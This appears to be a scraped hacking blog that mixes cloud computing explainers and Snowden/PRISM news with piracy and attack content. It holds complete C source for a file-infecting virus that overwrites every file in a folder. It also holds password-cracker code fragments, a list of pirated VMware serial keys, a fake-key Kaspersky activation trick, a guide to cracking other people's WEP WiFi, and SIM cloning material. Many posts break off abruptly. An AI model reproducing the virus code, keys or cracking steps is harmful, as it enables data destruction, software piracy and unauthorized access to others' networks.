Saturday, 16 August 2014


Cloud Computing Applications: Part 4

The applications of cloud computing are practically limitless. With the right middleware, a cloud computing system could execute all the programs a normal computer could run. Potentially, everything from generic word processing software to customized computer programs designed for a specific company could work on a cloud computing system.

Why would anyone want to rely on another computer system to run programs and store data? Here are just a few reasons:

  • Clients would be able to access their applications and data from anywhere at any time. They could access the cloud computing system using any computer linked to the Internet. Data wouldn't be confined to a hard drive on one user's computer or even a corporation's internal network.
  • It could bring hardware costs down. Cloud computing systems would reduce the need for advanced hardware on the client side. You wouldn't need to buy the fastest computer with the most memory, because the cloud system would take care of those needs for you. Instead, you could buy an inexpensive computer terminal. The terminal could include a monitor, input devices like a keyboard and mouse and just enough processing power to run the middleware necessary to connect to the cloud system. You wouldn't need a large hard drive because you'd store all your information on a remote computer.

Cloud Computing Architecture: Part 3



When talking about a cloud computing system, it's helpful to divide it into two sections: the front end and the back end. They connect to each other through a network, usually the Internet. The front end is the side the computer user, or client, sees. The back end is the "cloud" section of the system.

The front end includes the client's computer (or computer network) and the application required to access the cloud computing system. Not all cloud computing systems have the same user interface. Services like Web-based e-mail programs leverage existing Web browsers like Internet Explorer or Firefox. Other systems have unique applications that provide network access to clients.

On the back end of the system are the various computers, servers and data storage systems that create the "cloud" of computing services. In theory, a cloud computing system could include practically any computer program you can imagine, from data processing to video games. Usually, each application will have its own dedicated server.

Cloud Computing Concerns: Part 2

Perhaps the biggest concerns about cloud computing are security and privacy. The idea of handing over important data to another company worries some people. Corporate executives might hesitate to take advantage of a cloud computing system because they can't keep their company's information under lock and key.

The counterargument to this position is that the companies offering cloud computing services live and die by their reputations. It benefits these companies to have reliable security measures in place. Otherwise, the service would lose all its clients. It's in their interest to employ the most advanced techniques to protect their clients' data.
Privacy is another matter. If a client can log in from any location to access data and applications, it's possible the client's privacy could be compromised. Cloud computing companies will need to find ways to protect client privacy. One way is to use authentication techniques such as user names and passwords. Another is to employ an authorization format -- each user can access only the data and applications relevant to his or her job.



Cloud Computing: Part 1



To understand what is cloud computing, let's say you're an executive at a large corporation. Your particular responsibilities include making sure that all of your employees have the right hardware and software they need to do their jobs. Buying computers for everyone isn't enough -- you also have to purchase software or software licenses to give employees the tools they require. Whenever you have a new hire, you have to buy more software or make sure your current software license allows another user. It's so stressful that you find it difficult to go to sleep on your huge pile of money every night.

Friday, 1 August 2014

How To Open Banned Websites With Proxy Websites


Open Banned Websites WIth Proxy SitesThere are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by  malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy server which is faster and trusted. Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open banned sites.

How To Open Banned Site ?

Wednesday, 6 November 2013

REMOVE USB SHORTCUT VIRUS

If all your folders in pendrive/flash drives or memory cards are converted into shortcut icons then it is a good news for you. 

image
Now I’m going to tell you how to remove this virus without using any antivirus software. If you have not formatted your flash drive then you can solve this problem.

Most of the people come across this type of issues with their working environment.  So for solving it follow the steps given below:

Steps are very easy

First of all Click on Start >> Run >> and type cmd and click on OK

CYBER LAWS

Cyber Laws under Information Technology Act in India

- Section 43 of IT Act states any act of destroying, altering or stealing computer system/network or deleting information with act of damaging data or information without authorization of owner of that computer is liable for payment to be made to owner as compensation for damages

- Section 43A of IT Act states any corporate body dealing with sensitive information and negligent with implementing reasonable security practices causing loss or wrongful gain to any other person will also be liable as convict for compensation to the affected party

Monday, 24 June 2013

WHISTLE BLOWER UPDATE

Several stories involving whistle-blower/espionage suspect Edward Snowden cropped up over the weekend, including word of a U.S. demand for his extradition and that he flew to Moscow Sunday, and is likely heading for another destination. And news of a Justice Department search of a former WikiLeaks volunteer's Gmail account has also surfaced. Here's a quick summary:
Snowden was allowed to leave Hong Kong because a U.S. extradition request did not fully comply with Hong Kong law. He landed in Moscow early Sunday morning, but his final destination is unclear. According to a report in the New York Times, he may be headed to Ecuador, Cuba or Venezuela. Via its statement on its website  and  on Twitter, WikiLeaks said that it provided assistance to Snowden in his search for political asylum, and that he landed in Moscow accompanied by WikiLeaks legal advisers."

Saturday, 22 June 2013

Bank Accounts And Zeus Virus

How Your Bank Accounts Can Be Stolen With Zeus Virus?

 
 The 'Zeus Trojan Horse' Virus once again had a come back. According to a resource, it has an ability to drain your Bank accounts easily. Zeus Virus can propagate through phishing messages that are generated from the account that was already compromised with phishing. That phished account will then start sending messages to your friends containing links to the ads and would ask them to simply check-out the video or product by clicking on such links. This way the virus will go viral. Readers are requested to stay refrain from clicking such links, because they might end up getting their accounts compromised The virus is very sophisticated, so that it could replace the website of a bank with the mimicked page of its own. That fake page could then ask for your security information and some other important data that could be easily sold in black market. According to many sources, perhaps it has been confirmed that those pages are being hosted by Russian Mafia (known as Russian Business Network as well). About Zeus(Virus) The virus is well-known for what it use to do. It was detected once back in 2007, and after that detection it started to spread online. The virus is well-designed so that if you would click on it, the possible and important data like Passwords and Bank Accounts can be stolen easily. Does Facebook Took Action Against It? Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it. The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not satisfied well with their response. Those who are using windows should stay much careful about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux are still safe of this virus. Some countries like USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.

Sunday, 16 June 2013

HACK REMOTE COMPUTERS ON YOUR NETWORK

Note : I m not responsible for what ur going to do with this trick.






Firstly I Will Tell You What Is Internet Protocol (IP) ??



The Internet Protocol is the principal communications protocol used for relaying datagram (packets) across an
internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet. 



IP is the primary protocol in the Internet layer of the Internet Protocol Suite and has the task of delivering
datagrams from the source host to the destination host solely based on their addresses. For this Purpose, IP defines addressing methods and structures for datagram encapsulation

HACK WIFI USING WINDOWS

Hi all users I think many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on Backtrack and other Linux Tools . So today I'm here for sharing a method to Crack WiFi networks using WEP security protocol .The WEP is a very vulnerable to attacks and can be cracked easily .
 

 

 It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it . 
 
 
You will be using two tools :
 
1. Commview for WiFi : You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .The more packets you capture the better chances of cracking the password .You will need more than 1,00,000 minium packets to crack the password .The packets will be captured in the .ncp format .You will use this tool to
convert the .ncp to .cap .

SERIAL KEYS OF 50+ SOFTWARES

╚═►VMware Workstation v9.X ◄═╝
 
Serial Key:→↓
ZF3X0-4ZW0Q-0842P-E6PGC-PKRZF
VY19K-01X5L-084MY-MXMZG-MAUF2
YA5X2-FEFDK-H80VQ-4YWQC-MPARD
YU1WA-F1GD7-485UQ-ADNNT-XCAR6
GF1WR-FGZ5J-485RY-JGQQC-XZ2G8
AY3HA-F1D5N-08D7Q-Z6X5T-XK2G2
YG5EK-D1X8L-088XY-NNQEC-P3AW6
VF14H-0YFE5-48D2Z-ZDPNT-YFUZ8
ZU31H-2WY83-0853Y-Z5WQZ-ZAAC6
GC1WK-F8XEM-M812P-9WMG9-XUU9F
AY540-00W0M-088DY-GDQ7T-QL8Z8
FF34U-A5W11-H80UP-F6WNV-NL8V6
CF71K-AGD52-H894Q-Q4P7E-XL2R6
YZ5MA-6GXDP-0841Y-K4PNG-XK2ZF
========================================================================
 
╚═►NovaPDF Professional Desktop v7.7.387◄═╝

TOP 15 FREE HACKING TOOLS




1. Nmap





Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

Sim Card Cloning

[Sim Cloning is Illegal. This Post is

Only  For Educational Use]

 
 
SIM cloning is the process in which a legitimate SIM card is duplicated. When the cloning is completed, the cloned SIM card's identifying information is transferred onto a separate, secondary SIM card. The secondary card can then be used in a different phone while having all calls and associated charges attributed to the original SIM card. The phrase SIM clone is often used to refer to the SIM card that has been successfully duplicated.

YES, a SIM Can be Cloned**
 
** There are Special considerations & Not All SIMs available, can be cloned.
 
You Need Special Hardware. NOT the ordinarily available SIM Reader/Writer. These "Writers" can ONLY insert SMS & Contacts . Nothing Beyond That.
The Hardware should be able to write to the EEPROM (or Programmable Memory) of the SIM.

NSA whistleblower: U.S has been hacking into China, Hong Kong

Former CIA employee Edward Snowden says the NSA's controversial PRISM program extends to China and Hong Kong, according to an interview with a Hong Kong newspaper.
 
The U.S. government had been hacking into computers in Hong Kong and China for years, says NSA whistleblower Edward Snowden.
The former CIA employee stirred up a hornet's nest recently when he leaked details about PRISM, a National Security Agency program that collects certain user information from Internet companies and phone service providers in an effort to track down terrorists.
In an interview with the South China Morning Post, Snowden said that PRISM actually extends to people and institutions in Hong Kong and mainland China. The NSA itself has been hacking into computers in Hong Kong and China since 2009, he added, citing documents that had not been verified by the Post.

Mozilla, EFF, ACLU rally public against electronic surveillance


Monday, 10 June 2013

NSA PROGRAM OF US

What is the NSA's PRISM program? (FAQ)
 
We now know that the NSA uses something called PRISM to monitor private Web data. Sounds like "1984." What does it really mean?
 
You've been hearing about a top-secret government program reportedly giving the NSA access to digital consumer information held by large tech companies. But what is it, really, and how does it affect you? Reports are changing fast, so we created this FAQ to let you know what is known so far. We will continue to update it as the facts become clear.
 
What is PRISM?
PRISM stands for "Planning Tool for Resource Integration, Synchronization, and Management," and is a "data tool" designed to collect and process "foreign intelligence" that passes through American servers. Details about its existence were leaked to The Washington Post and The Guardian by Edward Snowden, a 29-year-old NSA contractor.
It has now been acknowledged by the Obama administration.
In the words of national security reporter Marc Ambinder, "PRISM [is] a kick-ass GUI that allows an analyst to look at, collate, monitor, and cross-check different data types provided to the NSA from Internet companies located inside the United States."

C PROGAM VIRUS


HOW TO CREATE VIRUS THROUGH "C" PROGRAMMING




#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

 

CODE FOR GETTING COMPUTER'S PASSWORD

CODE FOR GETTING COMPUTER'S PASSWORD


 Code :
 # include<stdio.h>
 # include<stdio.h>
 # include<process.h>
 # include<stdlib.h>
 # include<ctype.h>
 # include<conio.h>
 # include<mem.h>

 unsigned char huge Data[100001];
 unsigned char keystream[1001];
 int Rpoint[300];

 void main(int argc,char *argv[]){
 FILE *fd;
 int i,j;
 int size;
 char ch;
 char *name;
 int cracked;
 int sizemask;
 int maxr;
 int rsz;
 int pos;
 int Rall[300];     /* Resourse allocation table */

 if(argc<2){
   printf("usage: glide filename (username)");
   exit(1);
 }

PARTITION HIDING SOFTWARE IN C

PARTITION HIDING SOFTWARE IN C


 /* program to read the partition table of hard disk and can hide and
 revele partitions*/

 #include<stdio.h>
 #include<bios.h>
 #include<dos.h>
 #include<stdlib.h>

 typedef unsigned char BYTE;
 typedef unsigned int WORD;
 typedef unsigned long DWORD;

 enum BOOL {TRUE=0,FALSE=1};
 struct PARTITIONINFO {
  BYTE bootid;   /* bootable?  0=no, 128=yes  */
  BYTE beghead;  /* beginning head number */
  BYTE begsect;  /* beginning sector number */
  BYTE begcyl;   /* 10 bit nmbr, with high 2 bits put in begsect */
  BYTE systid;   /* Operating System type indicator code */
  BYTE endhead;  /* ending head number */
  BYTE endsect;  /* ending sector number */
  BYTE endcyl;   /* also a 10 bit nmbr, with same high 2 bit trick */
  DWORD relsect; /* first sector relative to start of disk */
  DWORD numsect; /* number of sectors in partition */
 };

FOLDER PROTECTION SOFTWARE


FOLDER PROTECTION PROGRAM


CAN BE COMPILED BY THE PREVIOSLY GIVEN COMPILERS IN THE POST NAMED SCREEN SAVER PASSWORD CRACKER.


 #include<stdio.h>
 #include<string.h>
 #include<process.h>
 void main()
 {
 FILE *p;
 char ch,s[100];
 char r[100]="REN ";

 char u[]=".{21EC2020-3AEA-1069-A2DD-08002B30309D} ";
 char v[50];
 int choice,i;

 clrscr();
 p=fopen("C:\a.bat","w+");
 if(p==NULL)

PASSWORD CRACKER

SCREEN SAVER PASSWORD CRACKER

THIS IS THE CODE OF A C/C++ PROGRAM WHICH CAN BE COMPILED BY USING DEV C++ AND CODE BLOKS OR TURBO C++. IT IS CREATED BY ONE OF MY FRIEND.


 /*
 Screen Saveer Password Cracker:
 Decrypts Screen Saver Password which is stored in user.dat.
 */

 #include<ctype.h>
 #include<stdio.h>
 #include<string.h>
 FILE *fp;
 char *path="c:\windows\user.dat";

 /*encrypted password stored in this file when u log on to default user..
 If there r multiple users..Password stored in
 \windowsprofilesuser-nameuser.dat...

 */

ACTIVATE KASPERSKY 2013 WITH KEY FILE

HOW TO ACTIVATE KASPERSKY 2013 13.0.1.4190 USING KEY FILES!
 
1. Open Kaspersky 2011 License Manager (from lower right corner).
 
2. Click 'Activate the application with a new license' button. (Delete any trial key first, by clicking the red X next to the key).
 
3. Disable your internet connection
 
4. Select 'Activate commercial version' and enter the activation license code as                                          11111-11111-11111-1111X
 
5. Wait activation wizard message-Click OK

Sunday, 9 June 2013

Once Again Anonymous And Hacktivists Shocked The World

How Anonymous And Hacktivists Shocked The World In 2013 ?


1. Anonymous Hacks FBI Cybercrime Conference Call
 The LulzSec gang announced its retirement in June 2011, and while some alleged members, such as Jake Davis — accused of being the group’s spokesman, “Topiary” — were arrested, at the beginning of 2012, many participants appeared to be still at large.
 Come February 2012, elements of Anonymous even took down the CIA’s public-facing website, and leaked an FBI conference callin which investigators coordinated Anonymous and LulzSec participants” arrests. Curiously, however, key details — such as the alleged hacktivists’ names — had been blanked out of the audio file that was ultimately released.
 
2. Stratfor Hack Upends Private Sector Intelligence Provider
 Also in February, Anonymous announced the release of a trove of emails and personal data stored by Strategic Forecasting, better known as Stratfor, which is an intelligence contractor. A member of Anonymous — who turned out to be LulzSec leader Sabu – reported that the plaintext emails and customer information had been obtained by exploiting known vulnerabilities in the Stratfor network. Ultimately, the breach exposed personal information on 860,000 Stratfor customers, 60,000 credit card numbers and a massive trove of emails between Stratfor and its sources.

HOW TO ENABLE REGISTRY EDITING (regedit) DISABLED BY ADMINISTRATOR

This is the common problem faced every PC user and many of you do you do not know how to re-enable it so now I am going to tell you how to do it please just follow the steps given below :-
Enable Registry Editor Using Group Policy Editor
1. Click on Start. Go to Run. Users running Windows 8, Windows 7 or Vista, go to Search.
2. Type gpedit.msc and press Enter.
3. Navigate to User Configuration/ Administrative Templates / System.
4. In the work area, double click on "Prevent Access to registry editing tools".

E-BOOK ON HACKING

COLLECTION OF ANKIT FADIA'S BOOKS

HEY FRIENDS YOU ALL KNOW ABOUT ANKIT FADIA. HE IS ONE OF THE MOST HONORABLE AND RENOWNED HACKER(ETHICAL HACKER). NOW I AM GOING TO GIVE YOU A LINK TO DOWNLOAD A COLLECTION OF HIS BOOKS.

List of Ankit fadia's Hacking EBooks


1 . Ankit Fadia Hacker's Guide
2 . Untold Windows Tips and Secrets(Ankit Fadia)
3 . Base64 Encoding Torn Apart
4 . Batch File Programing - Ankit Fadia
5 . Closing Open Holes
6 . Defacing Websites A step Process By Ankit fadia
7 . Dos Attacked
8 . Ankit Fadia - Encryption Algorithms Explained
9 . Firewalls - How to unblock it??
10 . FTP Exploits By Ankit Fadia.pdf
11 . Gathering info on Remote Host
12 . Hacking into Linux
13 . More Password Cracking Decrypted
14 . Removing Banners from your sites
15 . Sendmail and Beyond
16.SSL Torn Apart
17.Tracing IP,DNS,WHOIS-nslLookUp
18.Transparent Proxies in Squid
19.Transparent_proxies_with_Squid_By-Ankit Fadia
20.Truths!!!--What They Don't teach in
Manuals!!!.pdf

I'M BACK ONCE AGAIN

HELLO READERS I WAS BUSY IN MY RESEARCH WORK AND THUS WAS NOT ABLE TO POST ANY NEW THING SINCE A LONG TIME BUT NOW I AM BACK ONCE AGAIN AND YOU WILL BE ABLE TO GET SOME NEW OR COOL STUFFS IN THIS BLOG NOW. SO GET READY AND ENJOY MY NEW SIDE.

Saturday, 18 August 2012

CHECK LIST FOR PROTECTION

A protection check list


Here is a checklist of things you can do to make password cracking more difficult:
  1. Audit your organization! Do a walk through and make sure passwords are not stuck to monitors or under keyboards.
  2.  Set up dummy accounts. Get rid of the administrator (or admin) account or set it up as a trap and audit it for attempts.
  3.  Use strong, difficult to guess passwords, and never leave a console unlocked.
  4.  Backups are necessary in case you are compromised. You need a working set of data, so make sure you have it. Keep the tapes secure too, or the data there will be compromised as well.
  5.  Prevent dumpster diving. Don't throw sensitive information away; shred it or lock it up.
  6.  Check IDs and question people you don't know. When you have visitors, check them out and make sure they belong.
  7. Educate your end users. Make sure they aren't prone to social engineering and educate and remind internal users of the company's security policies.

ABOUT HACKING TOOLS

Tools of the trade


One of the most popular tools is L0phtCrack (now called LC4). L0phtCrack is a tool that allows an attacker to take encrypted Windows NT/2000 passwords and convert them to plain text. NT/2000 passwords are in cryptographic hashes and cannot be read without a tool like L0phtCrack. It works by attempting every alphanumeric combination possible to try to crack passwords.

METHODS OF HACKING

Password cracking doesn't always involve sophisticated tools. It can be as simple as finding a sticky note with the password written on it stuck right to the monitor or hidden under a keyboard. Another crude technique is known as "dumpster diving," which basically involves an attacker going through your garbage to find discarded documentation that may contain passwords.


Of course attacks can involve far greater levels of sophistication. Here are some of the more common techniques used in password cracking:

Friday, 17 August 2012

Steganography

 NEW TRICK FOR HIDING FILE

Encrypting and decrypting any data has been very old fashion in today’s era. Technology has developed so much that these are something in reach of every Tom, Dick and Harry. So, to be an odd one out in this era, we have to do something new…like Steganography. This is an art of hiding data into data. Merely Steganography is an idea developed in 1950 by a chemical engineer who invented a new way to write with invisible ink between the lines, by scientist Morse. From that era, till today much more have been developed.

Steganography is the science of hiding information. Whereas the goal of cryptography is to make

ABOUT HACKERS

TYPES OF HACKERS

White hat
A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software. The term "white hat" in Internet slang refers to an ethical hacker. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement. The EC-Council, also known as the International Council of Electronic Commerce Consultants has developed certifications, course ware, classes, and online training covering the diverse arena of Ethical Hacking.